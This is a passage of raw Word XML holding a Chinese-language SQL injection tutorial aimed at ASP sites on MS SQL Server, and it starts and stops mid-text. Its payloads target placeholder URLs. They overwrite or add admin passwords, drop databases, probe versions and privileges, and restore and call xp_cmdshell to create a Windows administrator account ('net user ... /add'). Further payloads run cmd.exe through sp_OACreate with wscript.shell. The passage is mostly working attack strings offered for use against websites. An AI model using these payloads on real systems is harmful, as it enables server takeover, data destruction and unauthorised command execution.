    <w:p w:rsidR="00580398" w:rsidRDefault="00580398" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>在注入的过程中暴出的管理员密码是经过</w:t>
      </w:r>
      <w:r w:rsidR="00171CCC">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidR="002B1E32">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>加密的，而</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>又无</w:t>
      </w:r>
      <w:r w:rsidR="00BC2C8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>法破解，这个时候</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>直接利用</w:t>
      </w:r>
      <w:r w:rsidR="00050927">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>注入来修改数据库中的数据，直接把管理员的密码改</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>掉。相关语句为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00977B96">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">;update 表名 set 列名='内容' where </w:t>
      </w:r>
      <w:r w:rsidR="00050927" w:rsidRPr="00977B96">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>条件</w:t>
      </w:r>
      <w:r w:rsidR="00050927">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>这里提交http://www.xxx.com/xxx.asp?id=xx;upda</w:t>
      </w:r>
      <w:r w:rsidR="00A44B4A">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>te admin set passw</w:t>
      </w:r>
      <w:r w:rsidR="003410C3">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>ord='123' w</w:t>
      </w:r>
      <w:r w:rsidR="00263271">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>here user</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>name='zyh'，其功能就是把</w:t>
      </w:r>
      <w:r w:rsidR="000C123F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>表中的</w:t>
      </w:r>
      <w:r w:rsidR="000C123F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="000C123F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>zyh</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>的密码改为123。这样就实现了对数据库</w:t>
      </w:r>
      <w:r w:rsidR="000C123F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>信息的修改。当然</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>也可以新添加一个管理员，相关语句为：</w:t>
      </w:r>
      <w:r w:rsidRPr="00977B96">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>;insert into 表名</w:t>
      </w:r>
      <w:r w:rsidR="00977B96">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>valu</w:t>
      </w:r>
      <w:r w:rsidRPr="00977B96">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>es (内</w:t>
      </w:r>
      <w:r w:rsidRPr="00977B96">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>容</w:t>
      </w:r>
      <w:r w:rsidRPr="00977B96">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)--</w:t>
      </w:r>
      <w:r w:rsidR="000C123F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>这里提交http://www.</w:t>
      </w:r>
      <w:r w:rsidR="000C123F">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>xxx.com/xxx.asp?id=xx;insert into admin v</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>alues(zyh,123)--，那么就能够往</w:t>
      </w:r>
      <w:r w:rsidR="008B56AA">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>表中添加一个</w:t>
      </w:r>
      <w:r w:rsidR="008B56AA">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>为zyh、</w:t>
      </w:r>
      <w:r w:rsidR="008B56AA">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidR="008B56AA">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>的管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="00580398">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742046" w:rsidRPr="00DD43F3" w:rsidRDefault="00DD43F3" w:rsidP="000E2C00">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD43F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00F672ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00103DCE" w:rsidRDefault="00DD43F3" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F672ED">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rsidR="00742046">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除数据库：</w:t>
      </w:r>
      <w:r w:rsidR="00103DCE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果得到了一个网站的后台数据库的名称为</w:t>
      </w:r>
      <w:r w:rsidR="00103DCE">
        <w:t>hack，那么我们执行</w:t>
      </w:r>
      <w:r w:rsidR="00742046">
        <w:t>;drop database</w:t>
      </w:r>
      <w:r w:rsidR="00742046">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00202A10">
        <w:t>hack</w:t>
      </w:r>
      <w:r w:rsidR="00103DCE">
        <w:t>后，</w:t>
      </w:r>
      <w:r w:rsidR="00202A10">
        <w:t>hack</w:t>
      </w:r>
      <w:r w:rsidR="00103DCE">
        <w:t>数据库不覆存在了，如http://www.xxx.c</w:t>
      </w:r>
      <w:r w:rsidR="00BC2368">
        <w:t>om/xxx.asp?id=xx;drop da</w:t>
      </w:r>
      <w:r w:rsidR="00202A10">
        <w:t>tabase</w:t>
      </w:r>
      <w:r w:rsidR="00BC2368">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00103DCE">
        <w:t>hack。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD43F3" w:rsidRDefault="00DD43F3" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F672ED">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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据库版本：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD43F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="003E4C93">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD43F3">
        <w:t>后面提交</w:t>
      </w:r>
      <w:r w:rsidR="00FA58DE">
        <w:t>and (select @@version)&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD43F3">
        <w:t>来获得数据库版本</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004406DB" w:rsidRDefault="004406DB" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F672ED">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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取数据库名：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD43F3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD43F3">
        <w:t>后面</w:t>
      </w:r>
      <w:r w:rsidRPr="004406DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r>
        <w:t>and db_name()&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="004406DB">
        <w:t>来获得当前数据库名</w:t>
      </w:r>
      <w:r w:rsidR="008E0B1C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008E0B1C" w:rsidRPr="008E0B1C">
        <w:t>SESSION_USER</w:t>
      </w:r>
      <w:r w:rsidR="008E0B1C">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008E0B1C" w:rsidRPr="008E0B1C">
        <w:t>CURRENT_USER</w:t>
      </w:r>
      <w:r w:rsidR="008E0B1C">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008E0B1C" w:rsidRPr="008E0B1C">
        <w:t>SYSTEM_USER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB72CA" w:rsidRDefault="00DB72CA" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F672ED">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3"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>④</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前数据库用户名：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提交</w:t>
      </w:r>
      <w:r w:rsidR="008E0B1C">
        <w:t>and user&gt;0</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB72CA">
        <w:t>获得当前数据库用户名</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0B1C" w:rsidRDefault="009C6F7A" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F672ED">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4"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>⑤</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断当前数据库权限：提交</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.xxx.com/xxx.asp?id=xx and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E82B84">
        <w:t>user&gt;0</w:t>
      </w:r>
      <w:r>
        <w:t>就可以了，如果返回值为“PUBLIC”那么当前就是 PUBLIC 权限了。要获得当前数据</w:t>
      </w:r>
      <w:r w:rsidR="008154B2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库名，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以提交</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.xxx.com/xxx.asp?id=xx</w:t>
      </w:r>
      <w:r w:rsidR="00E82B84">
        <w:t xml:space="preserve"> and db_name()&gt;0</w:t>
      </w:r>
      <w:r>
        <w:t>就可以了，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>果返回的值为“</w:t>
      </w:r>
      <w:r>
        <w:t>admin”，则当前数据库名为admin</w:t>
      </w:r>
      <w:r w:rsidR="003873AA">
        <w:t>。要判断是否支持多句查询</w:t>
      </w:r>
      <w:r w:rsidR="003873AA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>可以提</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> http://www.xxx.com/xxx.asp?id=xx;declare @a int--</w:t>
      </w:r>
      <w:r w:rsidR="003873AA">
        <w:t>。要判断是否支持子查询，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r>
        <w:t>以输入http://www.xxx.com/xxx.asp?id=xx and (select count(1) from</w:t>
      </w:r>
      <w:r w:rsidR="005D7CCE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>[sysobjects])&gt;=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F672ED" w:rsidRDefault="00F672ED" w:rsidP="000E2C00">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.数据库扩展功能</w:t>
      </w:r>
      <w:r w:rsidR="006760D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="006760D9" w:rsidRPr="00C32C38">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>D</w:t>
        </w:r>
        <w:r w:rsidR="006760D9" w:rsidRPr="00C32C38">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>OS命令</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006760D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3737D" w:rsidRDefault="00F3737D" w:rsidP="00CD7091">
      <w:r w:rsidRPr="005B75F2">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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidR="005B75F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否存在扩展存储过程：</w:t>
      </w:r>
      <w:r w:rsidR="00CD7091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用：</w:t>
      </w:r>
      <w:r w:rsidR="00CD7091">
        <w:t>SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell'就可以完成了。例</w:t>
      </w:r>
      <w:r w:rsidR="00CD7091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r w:rsidR="00CD7091">
        <w:t>http://www.xxx.com/xxx.asp?id=xx and SELECT count(*) FROM master.dbo.sysobjects WHERE xtype='X' AND name='xp_cmdshell'，如果返回正常则说明扩展存储过程存在，返回</w:t>
      </w:r>
      <w:r w:rsidR="00CD7091">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不正常的话就说明不存在。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C6B2A" w:rsidRPr="00F3737D" w:rsidRDefault="006C6B2A" w:rsidP="006C6B2A">
      <w:r w:rsidRPr="00F96F9F">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rsidRPr="006C6B2A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果扩展存储过程不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：可以使用：</w:t>
      </w:r>
      <w:r>
        <w:t>exec sp_addextendedproc xp_cmdshell,'xplog70.dll'</w:t>
      </w:r>
      <w:r w:rsidR="0070344A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>来恢复已经不存在的扩展存储过程，例如http://www.xxx.com/xxx.asp?id=xx; exec sp_addextendedproc xp_cmdshell,'xplog70.dll'</w:t>
      </w:r>
      <w:r w:rsidR="00B548C9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">执行之后，网站 </w:t>
      </w:r>
      <w:r w:rsidR="00FB4ED2" w:rsidRPr="00713D3F">
        <w:t>http://www.xxx.com/</w:t>
      </w:r>
      <w:r w:rsidR="00FB4ED2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>后台的数据库的扩展存储过程就被恢复了。而如果要删除扩展存储过程，我们只要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exec sp_dropextendedproc 'xp_cmdshell'这个命令就可以完成了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B03C7" w:rsidRDefault="006C6B2A" w:rsidP="000E2C00">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006C6B2A">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rsidR="00F672ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得shell：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F672ED" w:rsidRDefault="00F672ED" w:rsidP="003B03C7">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用存储过程</w:t>
      </w:r>
      <w:r>
        <w:t>(exec master..xp_cmdshell)</w:t>
      </w:r>
      <w:r w:rsidR="003B03C7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看服务器C盘目录：</w:t>
      </w:r>
      <w:r>
        <w:t>;exec master..xp_cmdshell ' dir c:\ '</w:t>
      </w:r>
      <w:r w:rsidR="00470697">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，所以提交</w:t>
      </w:r>
      <w:r w:rsidR="00470697">
        <w:t>http://www.xxx.com/xxx.asp?id=xx;exec master..xp_cmdshell 'net user 123 123/add'和 http://www.xxx.com/xxx.asp?id=xx;exec master..xp_cmdshell 'net localgroup administrators 123/add'</w:t>
      </w:r>
      <w:r w:rsidR="006760D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这就是往服务器添加一个1</w:t>
      </w:r>
      <w:r w:rsidR="006760D9">
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidR="006760D9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的管理员。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B03C7" w:rsidRDefault="003B03C7" w:rsidP="00CF111F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用O</w:t>
      </w:r>
      <w:r>
        <w:t>LE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获得shell：</w:t>
      </w:r>
      <w:r w:rsidR="00CF111F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个关键函数：Ⅰ</w:t>
      </w:r>
      <w:r w:rsidR="00CF111F" w:rsidRPr="00CF111F">
        <w:t>sp_OACreate</w:t>
      </w:r>
      <w:r w:rsidR="00CF111F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Ⅱ</w:t>
      </w:r>
      <w:r w:rsidR="00CF111F" w:rsidRPr="00CF111F">
        <w:t>sp_OAMethod</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL 语句为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>DECLARE @S INT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>EXEC SP_OACREAT 'wscript.shell',@s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>exec master..SPOAMETHOD @s,'run',null,'cmd.exe/c 需要执行的 DOS 命令(如 dir c:\)'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="00633B09" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用它</w:t>
      </w:r>
      <w:r w:rsidR="006A0791">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同样可以得到一个</w:t>
      </w:r>
      <w:r w:rsidR="006A0791">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="00153390">
        <w:t>，可以执行</w:t>
      </w:r>
      <w:r w:rsidR="006A0791">
        <w:t>各种命令。通过 URL 提交为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>http://www.xxx.com/xxx.asp?id=xx;DECLARE @S INT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>EXEC SP_OACREAT 'wscript.shell',@s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>exec master..SPOAMETHOD @s,'run',null,'cmd.exe/c dir c:\'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A0791" w:rsidRDefault="006A0791" w:rsidP="006A0791">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行的结果就是返回遍历服务器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C 盘下的所有文件，同样达到一个 shell </w:t>
      </w:r>
      <w:r w:rsidR="00907721">
        <w:t>的功能</w:t>
      </w:r>
      <w:r w:rsidR="00907721">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面两种获得</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell 的方法虽然好，但是必须是 SA 权限才能够执行的。</w:t>
      </w:r>
      <w:r w:rsidR="00907721">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入的网站的数据库不是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA 权限的话，那么上面获得 shell 的方法都没</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有用了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A6313" w:rsidRPr="00F672ED" w:rsidRDefault="006C6B2A" w:rsidP="005B0114">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="006C6B2A">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3"/>
          </mc:Choice>
          <mc:Fallback>
            <w:t>④</w:t>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="005B75F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其实</w:t>
      </w:r>
      <w:r w:rsidR="007A6313">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只要在</w:t>
      </w:r>
      <w:r w:rsidR="007A6313">
